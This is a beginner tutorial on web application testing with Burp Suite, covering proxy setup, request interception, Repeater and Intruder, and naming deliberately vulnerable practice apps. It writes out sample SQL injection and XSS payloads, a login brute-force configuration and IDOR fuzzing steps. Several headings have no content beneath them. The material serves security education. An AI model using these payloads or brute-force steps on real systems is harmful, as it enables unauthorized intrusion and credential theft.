Burp Suite Tutorial: Web Application Hacking for Beginners (2026 Edition)

Why Burp Suite Is the #1 Web Hacking Tool

Burp Suite is used by over 70,000 security professionals worldwide. It's the industry standard for web application penetration testing — combining an intercepting proxy, scanner, and manual testing tools in one platform.

You can follow this entire tutorial with the free Community Edition.

Step 1: Installation & Browser Setup

Install Burp Suite

# Download from PortSwigger
# https://portswigger.net/burp/communitydownload

# macOS (via Homebrew)
brew install --cask burp-suite

# Linux (direct download)
chmod +x burpsuite_community_linux_*.sh
./burpsuite_community_linux_*.sh

Configure Browser Proxy

Burp intercepts traffic by acting as a proxy between your browser and the target.

1. Open Burp Suite → Start with default settings
2. Proxy tab → Note the proxy is on 127.0.0.1:8080
3. Browser setup:

Firefox (recommended):
  Settings → Network Settings → Manual Proxy → 127.0.0.1:8080

Chrome (use FoxyProxy extension):
  Install FoxyProxy → Add proxy: 127.0.0.1:8080 → Enable

1. Install Burp's CA certificate (for HTTPS interception):
   • Browse to http://burp
   • Download CA Certificate
   • Import into browser's certificate store

Step 2: Understanding the Interface

Key Tabs

Step 3: Intercepting and Modifying Requests

Practice Target

Use a deliberately vulnerable app:

# DVWA (Damn Vulnerable Web Application)
docker run -d -p 80:80 vulnerables/web-dvwa

# OWASP Juice Shop
docker run -d -p 3000:3000 bkimminich/juice-shop

# PortSwigger labs (browser-based)
# https://portswigger.net/web-security

Intercept a Login Request

1. Turn on interception: Proxy → Intercept → Intercept is on
2. Submit a login form on your target
3. Burp catches the request:

POST /login HTTP/2
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

1. Modify the request — change parameters, headers, cookies
2. Click Forward to send it, or Drop to cancel

Step 4: Using Repeater for Manual Testing

Repeater lets you send the same request over and over with modifications — essential for testing injection attacks.

Testing for SQL Injection

1. Capture a request with a parameter: ?id=1
2. Send to Repeater (Ctrl+R)
3. Try injection payloads:

Original:  ?id=1
Test 1:    ?id=1'              → Look for SQL error
Test 2:    ?id=1 OR 1=1        → Look for different response
Test 3:    ?id=1 UNION SELECT null,null,null → Determine column count
Test 4:    ?id=1 UNION SELECT username,password,null FROM users

Testing for XSS

Original:  ?search=hello
Test 1:    ?search=<script>alert(1)</script>
Test 2:    ?search="><img src=x onerror=alert(1)>
Test 3:    ?search=javascript:alert(1)
Test 4:    ?search={{7*7}}      → Template injection check

Step 5: Using Intruder for Automated Attacks

Brute-Forcing a Login

1. Capture a login request
2. Send to Intruder (Ctrl+I)
3. Set attack positions:

POST /login HTTP/2
Host: target.com

username=§admin§&password=§test§

1. Set payloads:
   • Position 1: Usernames wordlist
   • Position 2: Passwords wordlist (rockyou-top-1000.txt)
2. Set attack type: Cluster Bomb (tests all combinations)
3. Start attack → Look for different response length/status code

Parameter Fuzzing for IDOR

GET /api/users/§1§/profile HTTP/2
Host: target.com
Authorization: Bearer your-token-here

Set payload: Numbers 1-1000. Look for 200 responses to IDs that aren't yours.

Step 6: Useful Burp Extensions

Install from Extender → BApp Store:

Step 7: OWASP Top 10 Testing with Burp

Quick Reference: Essential Keyboard Shortcuts

The best way to learn Burp Suite is to practice. Start with PortSwigger Web Security Academy labs — they're free, browser-based, and cover every OWASP vulnerability with step-by-step solutions.